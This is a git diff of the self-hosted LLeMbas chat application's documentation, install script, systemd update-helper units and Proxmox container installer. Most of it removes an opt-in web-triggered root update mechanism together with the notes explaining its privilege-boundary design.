- **Quotas** — monthly tokens, concurrent replies, agent wall clock, images a
|
||||
day, helpers a reply. Resolved by maximum across a person's groups, with zero
|
||||
meaning *no limit*
|
||||
- **Sharing** — hand a document, a note, a skill or a report to a group or a
|
||||
person, read-only, with a *Shared with me* filter in every listing
|
||||
- **Make it yours** — name, tagline, logo, favicon and launcher icons; the
|
||||
Middle-earth wording is editable data; custom **themes** defined as a set of
|
||||
colours rather than a stylesheet, and global CSS overrides
|
||||
override, and model access restricted to chosen groups
|
||||
- **Accounts** — first account becomes the administrator, argon2 password
|
||||
hashing, revocable server-side sessions, self-service password change,
|
||||
admin-managed accounts
|
||||
- **Admin settings** — registration, upload and extraction limits, prompt
|
||||
fragments, and an **Updates** page showing what is running, what is available
|
||||
and what changed between
|
||||
- **Two themes and your own** — *Moria* (dark), *Shire* (light), and as many
|
||||
more as you care to define
|
||||
- **Admin settings** — open or close registration from the UI, stored in the
|
||||
database and effective immediately
|
||||
- **Two themes** — *Moria* (dark) and *Shire* (light), switchable per user
|
||||
|
||||
**Planned**
|
||||
|
||||
OCR for scanned PDFs · conversation branching · chat export · archived chats.
|
||||
Image generation · OCR for scanned PDFs · semantic search in the library.
|
||||
|
||||
See the [Roadmap](https://git.houmeres.sk/Houmeres/LLeMbas/wiki/Roadmap) for what
|
||||
is built, what is not, and why.
|
||||
|
||||
## Documentation
|
||||
|
||||
The **[wiki](https://git.houmeres.sk/Houmeres/LLeMbas/wiki)** carries everything
|
||||
about how this works and why — it is documentation *about* the project rather
|
||||
than part of it, so a clone stays software.
|
||||
|
||||
- **[Working notes](https://git.houmeres.sk/Houmeres/LLeMbas/wiki/Working-notes)**
|
||||
— read this before changing anything. The hard rules the project is built
|
||||
around, the layout, and a long catalogue of *things that will bite you*: bugs
|
||||
that shipped looking correct, why each happened, and what stops it recurring.
|
||||
- **[Roadmap](https://git.houmeres.sk/Houmeres/LLeMbas/wiki/Roadmap)** — what is
|
||||
built, what is deliberately not, and the reasoning behind each.
|
||||
- A page each for agent chats, schedules and reports, permissions and sharing,
|
||||
search and extraction, image generation, subagents, branding, and the manual
|
||||
release checklist.
|
||||
See [PLAN.md](PLAN.md) for what is built, what is not, and why.
|
||||
|
||||
## Quick start
|
||||
|
||||
@@ -371,92 +322,6 @@ lembas secret-key # generate a value for LEMBAS_SECRET_KEY
|
||||
lembas create-admin # create or promote an administrator
|
||||
```
|
||||
|
||||
## Running it somewhere
|
||||
|
||||
Three ways, all in this repository.
|
||||
|
||||
### Docker
|
||||
|
||||
```bash
|
||||
export LEMBAS_SECRET_KEY="$(lembas secret-key)" # required; there is no default
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
One stage, no build step, non-root. The image bakes **no secret key, no data and
|
||||
no `.git`** — a key inside an image is one every copy shares, and rotating it
|
||||
makes stored API keys unreadable. Data lives in a named volume on `/data`.
|
||||
|
||||
`docker-compose.yml` publishes on `127.0.0.1` and expects a TLS proxy in front:
|
||||
the service worker and the microphone both require HTTPS or localhost, so plain
|
||||
http on a LAN address is a constraint rather than a preference. One replica, and
|
||||
that is deliberate — the generation registry, the terminal sessions and the
|
||||
schedule ticker are all in-process, so two would mean every schedule firing
|
||||
twice.
|
||||
|
||||
**Updating a container is pulling a new image**, and `/admin/updates` says so
|
||||
rather than offering a button:
|
||||
|
||||
```bash
|
||||
docker compose pull && docker compose up -d
|
||||
```
|
||||
|
||||
There is deliberately no in-container update helper. The one the other install
|
||||
paths use restarts a systemd service; the equivalent here would be a process
|
||||
inside the container reaching the Docker socket to replace the container it is
|
||||
running in — which is root on the host, granted to anybody who can administer
|
||||
the web interface. The image is the unit of deployment, and that is the whole
|
||||
point of it.
|
||||
|
||||
### A machine of its own
|
||||
|
||||
`deploy/` holds a systemd unit, an nginx vhost, and install/update scripts. Every
|
||||
template is parameterised and substituted at install time, so nothing
|
||||
host-specific is committed here. See [deploy/README.md](deploy/README.md).
|
||||
|
||||
`deploy/lxc-install.sh` creates an unprivileged Proxmox container and runs that
|
||||
same installer inside it — a wrapper around what already works rather than a
|
||||
second install path:
|
||||
|
||||
```bash
|
||||
CTID=140 SITE_HOST=chat.example ./deploy/lxc-install.sh
|
||||
```
|
||||
|
||||
The container gets the **update helper by default**, unlike a bare
|
||||
`install.sh`. The installer defaults it off because it cannot know what it is
|
||||
installing onto; a container this script made thirty seconds ago to run one
|
||||
thing, on a hypervisor you own, is not that host — and an appliance you cannot
|
||||
update without a shell is one nobody updates. `INSTALL_UPDATE_HELPER=0` opts
|
||||
out.
|
||||
|
||||
### Updating
|
||||
|
||||
**Admin → Updates** shows the version running, what is available on the channel
|
||||
this host follows, and the commits between. `stable` is the newest `vX.Y.Z` tag;
|
||||
`edge` is the branch tip, which is whatever was pushed most recently.
|
||||
|
||||
The button that applies an update is **opt-in**, and that is the design: the
|
||||
service runs unprivileged and cannot restart itself, so the request is a file
|
||||
that a systemd `.path` unit picks up and runs as root. It carries no ref and no
|
||||
channel — pressing it is always "deploy the channel this host was configured
|
||||
with", never "deploy something else". Install it with
|
||||
`INSTALL_UPDATE_HELPER=1`; without it the page says so and prints the command to
|
||||
run by hand.
|
||||
|
||||
Release notes come out of the annotated tag itself, so no forge API is involved
|
||||
anywhere.
|
||||
|
||||
Root runs a **copy** of `deploy/update.sh` that the installer places outside the
|
||||
checkout and root owns. It must not run the one in the checkout: that file
|
||||
belongs to the unprivileged service account, so anything able to write as that
|
||||
account could rewrite it and become root — and so could whoever controls the
|
||||
branch, since a pull happens as that account and root would run whatever it
|
||||
fetched. The cost is that changing `update.sh` needs the installer re-run, and
|
||||
it tells you when your copy has fallen behind.
|
||||
|
||||
**If you installed the helper before this changed, re-run the installer.** The
|
||||
old wiring points systemd at the checkout, and the update script now says so
|
||||
loudly when it notices it is running from there.
|
||||
|
||||
## How it fits together
|
||||
|
||||
```
|
||||
@@ -496,7 +361,7 @@ python scripts/fetch_vendor.py # verify vendored JS against the lockfile
|
||||
There is no Alembic. The schema is SQLite-only and synchronised at startup:
|
||||
missing tables and missing columns are added automatically, so adding a field to
|
||||
a model needs nothing but a restart. Renames, drops and retypes are still manual
|
||||
— see the [working notes](https://git.houmeres.sk/Houmeres/LLeMbas/wiki/Working-notes).
|
||||
— see `CLAUDE.md`.
|
||||
|
||||
## Artwork
|
||||
|
||||
|
||||
Binary file not shown.
|
Before Width: | Height: | Size: 654 B |
+2
-127
@@ -44,94 +44,8 @@ Everything is overridable from the environment:
|
||||
| `SERVICE_USER` | `lembas` | system account to run as |
|
||||
| `HOME_DIR` | `/home/lembas` | that account's home |
|
||||
| `PREFIX` | `/srv/lembas` | install root (bind mount of `HOME_DIR`) |
|
||||
| `REPO_URL` | this checkout's `origin` | so a fork deploys itself. **Must be https** — see below |
|
||||
| `LEMBAS_BRANCH` | `main` | branch to fetch, and what the `edge` channel follows |
|
||||
| `LEMBAS_CHANNEL` | `stable` | `stable` follows release tags, `edge` follows the branch tip |
|
||||
| `INSTALL_UPDATE_HELPER` | `0` | `1` lets the web interface deploy that branch as root |
|
||||
|
||||
**The deployment fetches over HTTPS, on purpose.** The service user has no SSH
|
||||
key and should not have one: a credential that can push to the repository,
|
||||
sitting on a box, to do a read-only job. If you push over SSH your checkout's
|
||||
`origin` is an `ssh://` URL, which is the one thing that cannot work here — so
|
||||
the installer refuses it and names the fix rather than letting the clone fail
|
||||
with `Permission denied (publickey)` from an account you were not thinking about.
|
||||
|
||||
## Channels
|
||||
|
||||
| | follows | for |
|
||||
|---|---|---|
|
||||
| `stable` (default) | the newest `vX.Y.Z` tag | anybody running this |
|
||||
| `edge` | the tip of `LEMBAS_BRANCH` | whoever is building it |
|
||||
|
||||
**A branch tip is not a release.** Following `main` means deploying whatever was
|
||||
pushed five minutes ago, possibly mid-feature — right for development and wrong
|
||||
for a machine somebody depends on. Stable is the default for that reason.
|
||||
|
||||
A tag with a suffix (`v1.1.0-rc1`) is deliberately **not** a release: git's
|
||||
version sort puts it *above* `v1.1.0`, so accepting one would step a stable host
|
||||
onto a release candidate on the strength of a hyphen. A prerelease is something
|
||||
you check out by name.
|
||||
|
||||
Release notes travel inside **annotated** tags, so `git tag -a v1.1.0 -m "…"` is
|
||||
what puts them on the update page. Tags here are **signed** (`tag.gpgSign`), and
|
||||
the notes render the same either way — `updates._notes_for` cuts the
|
||||
`-----BEGIN SSH SIGNATURE-----` block off `%(contents)`, which would otherwise be
|
||||
forty lines of base64 on the page. No forge API is involved anywhere — which
|
||||
matters more than it sounds: a token on the deployment host to answer a
|
||||
read-only question about version numbers is a bad trade, it would tie this to
|
||||
one forge, and the Gitea API this was checked against returns a 500 from a
|
||||
server-side panic on exactly that endpoint.
|
||||
|
||||
## Updating from the web interface
|
||||
|
||||
`/admin/updates` says what is running (`git describe`, so `1.0.0` at a tag and
|
||||
`1.0.0-7-gd4f56d` seven commits past one), what the channel offers, the release
|
||||
notes, and the commits between. **Checking** reaches the remote; opening the page
|
||||
does not.
|
||||
|
||||
The button is opt-in, and the reason is a boundary rather than caution:
|
||||
|
||||
```bash
|
||||
INSTALL_UPDATE_HELPER=1 SITE_HOST=chat.example ./deploy/install.sh
|
||||
```
|
||||
|
||||
That installs `lembas-update.path` and `lembas-update.service`, and puts a
|
||||
**root-owned copy** of `update.sh` at `/usr/local/lib/lembas/update.sh`. The web
|
||||
interface writes `$PREFIX/data/update-requested`; the path unit notices and the
|
||||
service runs that copy **as root**, on the configured channel.
|
||||
|
||||
**Why a copy.** The unit used to point inside the checkout, and `install.sh`
|
||||
clones the checkout *as the service user* — so root was executing a file the
|
||||
unprivileged account could rewrite, and one that every update replaces with
|
||||
whatever the branch contained. Either turns a compromise of the web application
|
||||
into root, and the second needs no compromise at all. The cost is that changing
|
||||
`update.sh` needs the installer re-run; the script tells you when its copy has
|
||||
fallen behind, and says so loudly if it finds itself running from inside the
|
||||
checkout.
|
||||
|
||||
**If you installed the helper before 1.0.0, re-run the installer.** The old
|
||||
wiring stays until you do, and the update button cannot fix it — the button runs
|
||||
the old unit.
|
||||
|
||||
**What that grants.** Anybody who can administer this web interface can then
|
||||
deploy whatever is on the configured branch and restart the service. That is the
|
||||
point of it, and it is why it is not the default.
|
||||
|
||||
**What it deliberately does not grant.** The request file carries nothing that
|
||||
reaches a command line — no ref, no branch, no channel, no arguments, and its
|
||||
*contents* are never read at all. Both are baked into the unit at install time,
|
||||
so the button is always "deploy the channel this host was configured with" and
|
||||
never "deploy something else". Re-running the installer without the flag removes
|
||||
both units, the marker and the root-owned copy, and the page goes back to
|
||||
printing the manual command.
|
||||
|
||||
A re-run **keeps the channel this host already follows** rather than resetting it
|
||||
to `stable`: the channel is declared in `lembas.env` and in the unit, a re-run
|
||||
keeps the first while rewriting the second, and an installer that silently moved
|
||||
one half was causing exactly the mismatch the Updates page detects.
|
||||
|
||||
Without the helper the page says so and shows `sudo …/deploy/update.sh`, which is
|
||||
the same honest degradation the SSH and search extras have.
|
||||
| `REPO_URL` | this checkout's `origin` | so a fork deploys itself |
|
||||
| `LEMBAS_BRANCH` | `main` | branch to deploy |
|
||||
|
||||
## Deploying a change
|
||||
|
||||
@@ -145,45 +59,6 @@ reinstalls dependencies and restarts, printing the commits it pulled. The hard
|
||||
reset is deliberate: nothing is ever edited in place there, so there is no local
|
||||
work to preserve and no conflicts to resolve.
|
||||
|
||||
## In a container
|
||||
|
||||
A `Dockerfile` and a `docker-compose.yml` are in the repository root.
|
||||
|
||||
```bash
|
||||
echo "LEMBAS_SECRET_KEY=$(python -c 'import secrets;print(secrets.token_urlsafe(48))')" > .env
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
It publishes on `127.0.0.1:8080` and expects **a TLS reverse proxy in front**.
|
||||
That is a constraint, not a preference: a service worker and a microphone both
|
||||
require HTTPS or localhost, so over plain http on a LAN address the app cannot be
|
||||
installed and cannot dictate — and the session cookie is deliberately not marked
|
||||
`secure`, so an attacker on that network could steal a session.
|
||||
|
||||
Three things about the image:
|
||||
|
||||
- **No secret key is baked in**, and compose refuses to start without one. A key
|
||||
in an image is a key every copy of that image shares, and rotating it signs
|
||||
everybody out *and* makes stored upstream API keys unreadable.
|
||||
- **`.git` is excluded**, so `/admin/updates` inside a container says it was not
|
||||
installed from a checkout and offers nothing. That is correct: a container is
|
||||
updated by pulling a new image.
|
||||
- **One replica.** The generation registry, the stop mechanism, the terminal
|
||||
sessions and the schedule ticker are all in-process — two would mean two
|
||||
tickers and every schedule firing twice.
|
||||
|
||||
## On Proxmox
|
||||
|
||||
```bash
|
||||
CTID=140 SITE_HOST=chat.example ./deploy/lxc-install.sh
|
||||
```
|
||||
|
||||
Run on the Proxmox host. It creates an **unprivileged** Debian container,
|
||||
installs the dependencies, and runs `deploy/install.sh` inside it — the same
|
||||
installer, so a fix there reaches this without anybody remembering. Unprivileged
|
||||
is not a default to change: nothing LLeMbas does needs privilege, because agent
|
||||
chats run their commands over SSH on some *other* machine.
|
||||
|
||||
## Operating it
|
||||
|
||||
```bash
|
||||
|
||||
+3
-123
@@ -26,32 +26,6 @@ SERVICE_USER="${SERVICE_USER:-lembas}"
|
||||
HOME_DIR="${HOME_DIR:-/home/lembas}"
|
||||
PREFIX="${PREFIX:-/srv/lembas}"
|
||||
BRANCH="${LEMBAS_BRANCH:-main}"
|
||||
# Which channel this host follows: `stable` (the newest release tag) or `edge`
|
||||
# (the branch tip). Stable by default, because a branch tip is not a release --
|
||||
# following one means deploying whatever was pushed five minutes ago, which is
|
||||
# right for whoever builds this and wrong for whoever runs it.
|
||||
# On a **re-run**, default to what this host already follows rather than to
|
||||
# `stable`. The channel lives in two places -- `lembas.env`, which the page
|
||||
# reads, and the systemd unit, which the button obeys -- and a re-run keeps the
|
||||
# env file ("keeping it, and its secret key") while rewriting the unit. So a
|
||||
# re-run to fix something unrelated silently moved one half and not the other,
|
||||
# and left the host with a page naming one channel and a button deploying
|
||||
# another. That mismatch has an alert of its own; an installer that *causes* it
|
||||
# is the wrong end to be detecting it from.
|
||||
#
|
||||
# Parsed, not sourced -- `lembas.env` holds the secret key, and there is no
|
||||
# reason for this to have it in a variable.
|
||||
_installed_channel=""
|
||||
if [[ -f "$PREFIX/lembas.env" ]]; then
|
||||
_installed_channel=$(sed -n 's/^LEMBAS_UPDATE_CHANNEL=\([a-z]\{1,16\}\)$/\1/p' \
|
||||
"$PREFIX/lembas.env" | tail -1)
|
||||
fi
|
||||
CHANNEL="${LEMBAS_CHANNEL:-${_installed_channel:-stable}}"
|
||||
# Whether to install the units that let the web interface update this host.
|
||||
# Off, and off on a re-run that does not ask for it: it grants anybody who can
|
||||
# administer the web UI the ability to deploy the branch, as root. See the
|
||||
# "Updating from the web interface" section of deploy/README.md.
|
||||
INSTALL_UPDATE_HELPER="${INSTALL_UPDATE_HELPER:-0}"
|
||||
# Default to wherever this checkout came from, so a fork deploys itself.
|
||||
REPO_URL="${REPO_URL:-$(git -C "$HERE" remote get-url origin 2>/dev/null || true)}"
|
||||
|
||||
@@ -64,44 +38,18 @@ if [[ -z "$REPO_URL" ]]; then
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# The deployment clones as the service user, which has no SSH key and should not
|
||||
# have one: a credential that can push to the repository, sitting on a box, to
|
||||
# do a read-only job. Whoever runs this usually has an ssh:// origin because
|
||||
# *they* push over SSH, so the default inherited from their checkout is the one
|
||||
# thing that cannot work here.
|
||||
#
|
||||
# The clone would fail loudly anyway. Saying so first turns "Permission denied
|
||||
# (publickey)" from the service user into a sentence that names the fix.
|
||||
if [[ "$REPO_URL" == ssh://* || "$REPO_URL" == git@* ]]; then
|
||||
echo "== repository ==" >&2
|
||||
echo " $REPO_URL is an SSH URL, and $SERVICE_USER has no key." >&2
|
||||
echo " Set an https URL, which is what a deployment should fetch over:" >&2
|
||||
echo " REPO_URL=https://host/owner/repo.git $0" >&2
|
||||
echo " (Or give $SERVICE_USER a read-only deploy key and re-run.)" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "== plan =="
|
||||
echo " host : https://$SITE_HOST -> 127.0.0.1:$APP_PORT"
|
||||
echo " user : $SERVICE_USER ($HOME_DIR)"
|
||||
echo " prefix : $PREFIX"
|
||||
echo " repo : $REPO_URL ($BRANCH, $CHANNEL channel)"
|
||||
if [[ "$INSTALL_UPDATE_HELPER" == "1" ]]; then
|
||||
echo " updates : web interface may deploy $BRANCH as root (helper units)"
|
||||
else
|
||||
echo " updates : by hand only ($PREFIX/app/deploy/update.sh)"
|
||||
fi
|
||||
echo " repo : $REPO_URL ($BRANCH)"
|
||||
|
||||
echo "== service user =="
|
||||
# --system: no ageing, no mail spool. Home under /home, not /var/lib, so the
|
||||
# venv and database sit on the larger volume.
|
||||
#
|
||||
# `/usr/sbin/nologin` is Debian's path and works on both: Arch keeps `nologin`
|
||||
# in /usr/bin, but its /usr/sbin is a symlink to bin, so the Debian spelling
|
||||
# resolves there while the Arch one does not resolve on Debian at all.
|
||||
if ! getent passwd "$SERVICE_USER" >/dev/null; then
|
||||
sudo useradd --system --create-home --home-dir "$HOME_DIR" \
|
||||
--shell /usr/sbin/nologin --comment "LLeMbas" "$SERVICE_USER"
|
||||
--shell /usr/bin/nologin --comment "LLeMbas" "$SERVICE_USER"
|
||||
else
|
||||
echo " user $SERVICE_USER already exists"
|
||||
fi
|
||||
@@ -124,13 +72,8 @@ else
|
||||
fi
|
||||
|
||||
echo "== virtualenv =="
|
||||
# `python3`, not `python`. On Arch -- the machine this was written on and the
|
||||
# only one it had ever run on -- `python` is Python 3 and the bare name worked.
|
||||
# On Debian it does not exist unless somebody installed `python-is-python3`, so
|
||||
# the LXC bootstrap aborted here, after the service user, the bind mount and the
|
||||
# clone were already in place. `python3` is correct on both.
|
||||
if [[ ! -x "$VENV/bin/python" ]]; then
|
||||
sudo -u "$SERVICE_USER" python3 -m venv "$VENV"
|
||||
sudo -u "$SERVICE_USER" python -m venv "$VENV"
|
||||
fi
|
||||
sudo -u "$SERVICE_USER" "$VENV/bin/pip" install --quiet --upgrade pip
|
||||
# The extras a deployment gets. `search` because DuckDuckGo is the default web
|
||||
@@ -158,13 +101,6 @@ LEMBAS_PORT=$APP_PORT
|
||||
LEMBAS_LOG_LEVEL=info
|
||||
LEMBAS_ALLOW_SIGNUP=true
|
||||
LEMBAS_DEFAULT_THEME=moria
|
||||
# Which branch /admin/updates compares against. Deployment configuration, not
|
||||
# an instance setting: it decides what code runs here, and a value a web
|
||||
# administrator could edit would turn "you may deploy the branch" into "you may
|
||||
# deploy anything".
|
||||
LEMBAS_UPDATE_BRANCH=$BRANCH
|
||||
# stable follows the newest release tag; edge follows the branch tip.
|
||||
LEMBAS_UPDATE_CHANNEL=$CHANNEL
|
||||
EOF
|
||||
sudo chown "$SERVICE_USER:$SERVICE_USER" "$ENV_FILE"
|
||||
sudo chmod 600 "$ENV_FILE"
|
||||
@@ -184,62 +120,6 @@ sed -e "s|__PREFIX__|$PREFIX|g" -e "s|__SERVICE_USER__|$SERVICE_USER|g" \
|
||||
sha256sum "$HERE/lembas.service" | cut -d' ' -f1 | sudo tee "$PREFIX/.unit-applied" >/dev/null
|
||||
sudo systemctl daemon-reload
|
||||
|
||||
echo "== update helper =="
|
||||
# Two units and a marker. The marker is what the web interface reads to decide
|
||||
# whether to offer the button at all -- a file rather than `systemctl
|
||||
# is-enabled`, because that would be a subprocess on every page render to answer
|
||||
# a question that changes once.
|
||||
UPDATE_MARKER="$PREFIX/data/.update-helper"
|
||||
# Where root's copy of the update script lives, and why it is a copy.
|
||||
#
|
||||
# The unit runs as root. Pointing its ExecStart at `$PREFIX/app/deploy/update.sh`
|
||||
# meant root executing a file owned by the **unprivileged service account** --
|
||||
# so anything able to write as that account could rewrite the script, create the
|
||||
# request file it also owns, and be root. That is the whole privilege boundary
|
||||
# the helper exists to keep, defeated by a `chown`.
|
||||
#
|
||||
# The second path is worse because it needs no compromise at all: an update
|
||||
# pulls new code *as the service user*, and root then runs whatever
|
||||
# `deploy/update.sh` that pull contained. Control of the branch would have been
|
||||
# control of root.
|
||||
#
|
||||
# So root runs a copy it owns, installed here, by an administrator, deliberately.
|
||||
# The cost is that improving `update.sh` needs `install.sh` re-run -- which is
|
||||
# the correct trade: root should not execute a script that arrived over the
|
||||
# network a moment ago.
|
||||
UPDATE_HELPER_DIR="/usr/local/lib/lembas"
|
||||
UPDATE_HELPER="$UPDATE_HELPER_DIR/update.sh"
|
||||
if [[ "$INSTALL_UPDATE_HELPER" == "1" ]]; then
|
||||
sudo mkdir -p "$UPDATE_HELPER_DIR"
|
||||
sudo install -o root -g root -m 755 "$HERE/update.sh" "$UPDATE_HELPER"
|
||||
for unit in lembas-update.path lembas-update.service; do
|
||||
sed -e "s|__PREFIX__|$PREFIX|g" \
|
||||
-e "s|__SERVICE_USER__|$SERVICE_USER|g" \
|
||||
-e "s|__UPDATE_BRANCH__|$BRANCH|g" \
|
||||
-e "s|__UPDATE_CHANNEL__|$CHANNEL|g" \
|
||||
-e "s|__UPDATE_HELPER__|$UPDATE_HELPER|g" \
|
||||
"$HERE/$unit" | sudo tee "/etc/systemd/system/$unit" >/dev/null
|
||||
done
|
||||
sudo systemctl daemon-reload
|
||||
sudo systemctl enable --now lembas-update.path
|
||||
# The channel goes *into* the marker, not just its existence. It is declared
|
||||
# in two places -- the unit above and lembas.env -- and this is what lets the
|
||||
# Updates page notice when somebody has edited one and not the other.
|
||||
echo "$CHANNEL" | sudo tee "$UPDATE_MARKER" >/dev/null
|
||||
sudo chown "$SERVICE_USER:$SERVICE_USER" "$UPDATE_MARKER"
|
||||
echo " installed. The web interface can now deploy the $CHANNEL channel and restart."
|
||||
else
|
||||
# Removed rather than left, so turning it off is re-running without the flag
|
||||
# rather than remembering three commands. The button then says so and prints
|
||||
# the manual one, which is the honest degradation.
|
||||
sudo systemctl disable --now lembas-update.path 2>/dev/null || true
|
||||
sudo rm -f /etc/systemd/system/lembas-update.path \
|
||||
/etc/systemd/system/lembas-update.service "$UPDATE_MARKER" \
|
||||
"$UPDATE_HELPER"
|
||||
sudo systemctl daemon-reload
|
||||
echo " not installed (INSTALL_UPDATE_HELPER=1 to allow updating from the web UI)"
|
||||
fi
|
||||
|
||||
echo "== self-signed cert for $SITE_HOST =="
|
||||
sudo mkdir -p /etc/nginx/ssl
|
||||
if [[ ! -f "/etc/nginx/ssl/$SITE_HOST.crt" ]]; then
|
||||
|
||||
@@ -1,23 +0,0 @@
|
||||
# Watches for an update request written by the web interface.
|
||||
#
|
||||
# install.sh substitutes __PREFIX__ and writes the result to
|
||||
# /etc/systemd/system/lembas-update.path. Installed only when the installer is
|
||||
# run with INSTALL_UPDATE_HELPER=1 — see deploy/README.md for what that decision
|
||||
# means.
|
||||
#
|
||||
# `PathExists` rather than `PathChanged`: the service deletes the file as its
|
||||
# first act, so the unit re-arms itself and a second request fires again. With
|
||||
# `PathChanged` a request written while the service was running would be missed.
|
||||
|
||||
[Unit]
|
||||
Description=Watch for a LLeMbas update request
|
||||
# Only while the thing being updated is meant to be running. Stopping lembas on
|
||||
# purpose should not leave a watcher that restarts it.
|
||||
PartOf=lembas.service
|
||||
|
||||
[Path]
|
||||
PathExists=__PREFIX__/data/update-requested
|
||||
Unit=lembas-update.service
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
@@ -1,47 +0,0 @@
|
||||
# Runs deploy/update.sh when the web interface asks for it.
|
||||
#
|
||||
# install.sh substitutes __PREFIX__, __SERVICE_USER__ and __UPDATE_BRANCH__ and
|
||||
# writes the result to /etc/systemd/system/lembas-update.service.
|
||||
#
|
||||
# **What this grants.** Installing it means anybody who can administer the web
|
||||
# interface can deploy whatever is on the configured branch, as root, and
|
||||
# restart the service. That is the point of it, and it is why it is opt-in and
|
||||
# why the installer says so out loud rather than doing it by default.
|
||||
#
|
||||
# **What it deliberately does not grant.** The request file carries nothing that
|
||||
# reaches this command line: no ref, no branch, no channel, no arguments. Both
|
||||
# are baked in below from the installer's environment, so pressing the button is
|
||||
# "deploy the channel this host was configured with" and can never be "deploy
|
||||
# something else". Nothing reads the file's *contents* either -- `ExecStartPre`
|
||||
# deletes it and the `.path` unit only ever tested that it exists.
|
||||
#
|
||||
# And root runs a script **root owns**. See ExecStart.
|
||||
|
||||
[Unit]
|
||||
Description=Apply a requested LLeMbas update
|
||||
# Not `After=lembas.service`: this restarts it, and an ordering dependency on
|
||||
# the thing being restarted is how a one-shot ends up waiting for itself.
|
||||
|
||||
[Service]
|
||||
Type=oneshot
|
||||
# Deleted first, always. The path unit re-arms on the file existing, so leaving
|
||||
# it in place would run this again the moment the service came back -- an
|
||||
# update loop with no obvious cause. `-` so a failure to delete does not stop
|
||||
# the update, and `ExecStartPre` so it happens even if the script itself fails.
|
||||
ExecStartPre=-/usr/bin/rm -f __PREFIX__/data/update-requested
|
||||
Environment=SERVICE_USER=__SERVICE_USER__
|
||||
Environment=PREFIX=__PREFIX__
|
||||
Environment=LEMBAS_BRANCH=__UPDATE_BRANCH__
|
||||
Environment=LEMBAS_CHANNEL=__UPDATE_CHANNEL__
|
||||
# **Not** `__PREFIX__/app/deploy/update.sh`. That path is inside the checkout and
|
||||
# owned by the unprivileged service account, so root would have been executing a
|
||||
# file that account could rewrite -- and that an update could replace, since a
|
||||
# pull runs as that account and root runs whatever it fetched on the next press.
|
||||
# `install.sh` puts a root-owned copy here instead. Improving the script means
|
||||
# re-running the installer, which is the right cost.
|
||||
ExecStart=/bin/bash __UPDATE_HELPER__
|
||||
# The script's own failure path prints the journal and exits non-zero, which is
|
||||
# what makes `systemctl status lembas-update` say what went wrong.
|
||||
StandardOutput=journal
|
||||
StandardError=journal
|
||||
TimeoutStartSec=600
|
||||
@@ -1,156 +0,0 @@
|
||||
#!/usr/bin/env bash
|
||||
# Create a Debian LXC container on a Proxmox host and install LLeMbas in it.
|
||||
#
|
||||
# A **wrapper around what already works**, not a second install path. It makes a
|
||||
# container, puts the dependencies in it, and runs `deploy/install.sh` inside --
|
||||
# which is the same script, doing the same things, so a fix to the installer
|
||||
# reaches this without anybody remembering. A parallel installer would be two
|
||||
# things to keep correct and one of them would rot.
|
||||
#
|
||||
# Run this on the Proxmox host, as root:
|
||||
#
|
||||
# CTID=140 SITE_HOST=chat.example ./deploy/lxc-install.sh
|
||||
#
|
||||
# Everything is overridable:
|
||||
#
|
||||
# CTID next free id the container's id
|
||||
# CT_HOSTNAME lembas hostname inside it
|
||||
# CT_STORAGE local-lvm where the rootfs goes
|
||||
# CT_TEMPLATE debian-12 template, matched against pveam list
|
||||
# CT_DISK 12 GB
|
||||
# CT_CORES 2
|
||||
# CT_MEMORY 4096 MB
|
||||
# CT_BRIDGE vmbr0
|
||||
# CT_IP dhcp or 192.168.1.50/24
|
||||
# CT_GATEWAY (unset) required when CT_IP is static
|
||||
# REPO_URL this checkout's origin
|
||||
# SITE_HOST lembas.local
|
||||
#
|
||||
# **Unprivileged, and that is not a default to change lightly.** Nothing LLeMbas
|
||||
# does needs privilege: agent chats run their commands over SSH on some *other*
|
||||
# machine, which is the whole isolation story. A privileged container would give
|
||||
# up the host's protection to buy nothing.
|
||||
set -euo pipefail
|
||||
|
||||
CT_HOSTNAME="${CT_HOSTNAME:-lembas}"
|
||||
CT_STORAGE="${CT_STORAGE:-local-lvm}"
|
||||
CT_TEMPLATE="${CT_TEMPLATE:-debian-12}"
|
||||
CT_DISK="${CT_DISK:-12}"
|
||||
CT_CORES="${CT_CORES:-2}"
|
||||
CT_MEMORY="${CT_MEMORY:-4096}"
|
||||
CT_BRIDGE="${CT_BRIDGE:-vmbr0}"
|
||||
CT_IP="${CT_IP:-dhcp}"
|
||||
CT_GATEWAY="${CT_GATEWAY:-}"
|
||||
SITE_HOST="${SITE_HOST:-lembas.local}"
|
||||
BRANCH="${LEMBAS_BRANCH:-main}"
|
||||
|
||||
HERE="$(dirname "$(readlink -f "$0")")"
|
||||
REPO_URL="${REPO_URL:-$(git -C "$HERE" remote get-url origin 2>/dev/null || true)}"
|
||||
|
||||
if ! command -v pct >/dev/null; then
|
||||
echo "pct not found. Run this on a Proxmox host." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [[ -z "$REPO_URL" ]]; then
|
||||
echo "Could not determine REPO_URL. Set it explicitly." >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
CTID="${CTID:-$(pvesh get /cluster/nextid)}"
|
||||
|
||||
# The template has to be on the host before a container can be made from it.
|
||||
# Matched by prefix rather than pinned to a filename, because the point release
|
||||
# in it moves and a hard-coded name would break on a host that downloaded a
|
||||
# different one.
|
||||
echo "== template =="
|
||||
template=$(pveam list local 2>/dev/null | awk -v want="$CT_TEMPLATE" '$1 ~ want {print $1}' | head -1)
|
||||
if [[ -z "$template" ]]; then
|
||||
available=$(pveam available --section system | awk -v want="$CT_TEMPLATE" '$2 ~ want {print $2}' | tail -1)
|
||||
if [[ -z "$available" ]]; then
|
||||
echo "No template matching '$CT_TEMPLATE'. Try: pveam available --section system" >&2
|
||||
exit 1
|
||||
fi
|
||||
echo " downloading $available"
|
||||
pveam download local "$available"
|
||||
template="local:vztmpl/$available"
|
||||
fi
|
||||
echo " $template"
|
||||
|
||||
echo "== container $CTID =="
|
||||
if pct status "$CTID" >/dev/null 2>&1; then
|
||||
echo " $CTID already exists, using it"
|
||||
else
|
||||
net="name=eth0,bridge=$CT_BRIDGE,ip=$CT_IP"
|
||||
[[ -n "$CT_GATEWAY" ]] && net="$net,gw=$CT_GATEWAY"
|
||||
pct create "$CTID" "$template" \
|
||||
--hostname "$CT_HOSTNAME" \
|
||||
--cores "$CT_CORES" \
|
||||
--memory "$CT_MEMORY" \
|
||||
--rootfs "$CT_STORAGE:$CT_DISK" \
|
||||
--net0 "$net" \
|
||||
